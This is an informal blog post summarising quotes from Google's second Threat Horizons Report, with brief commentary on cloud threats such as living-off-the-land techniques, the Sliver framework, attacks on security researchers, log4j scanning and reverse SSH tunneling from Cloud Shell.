Google Cybersecurity Action Team Threat Horizons Report #2 Is Out!
Published in
2 min readFeb 15, 2022
This is my completely informal, uncertified, unreviewed and otherwise unofficial blog inspired by my reading of our second Threat Horizons Report (full version, short version) that we just released (the official blog for #1 is here).
My favorite quotes follow below:
- “Threat actors have been known to use tools native to the Cloud environment rather than downloading custom malware or scripts to avoid detection. This “living off the land” technique has been used extensively in on-premise compromises and is being adopted in Cloud environments. ” [A.C. — highlight is mine, just a reminder that “malware-less” intrusions are the norm in the cloud too]
- “Sliver is an open-source, cross-platform adversary emulation framework that allows adversaries to deploy and control implants on victims’ Windows, Mac, or Linux computers from a central coordinating server.” [A.C. — not all badness is about Cobalt Strike …]
- “Over the past 12+ months, the actor has launched multiple campaigns against the security and vulnerability research community including the following techniques: Developing fake social media profiles and submitting real bugs to bug bounty programs in order to build credibility. […] Suspected of using 0-days, which were stolen from some of their victims. ” [A.C. — imagine being hit by a 0-day that the attacker stole somewhere …]
- “Google Cloud is continuing to see scanning (400K times a day) and expects similar, if not more scanning levels against all providers, and so we recommend continued vigilance in ensuring patching is effective. ” [A.C. — so, no, log4j is not over]
- “The availability of outbound connections to conduct a reverse SSH tunneling from the Cloud Shell to any endpoint on the Internet is serving as a means for threat actors to distribute malicious campaigns or perform harmful activity.” [A.C. — this is a reminder that an outbound connection is always an ominous sign, cloud or not]
Enjoy the report!
Related:
- Google Cybersecurity Action Team
- First report can be found here
- Full second report
- Brief summary of our second report
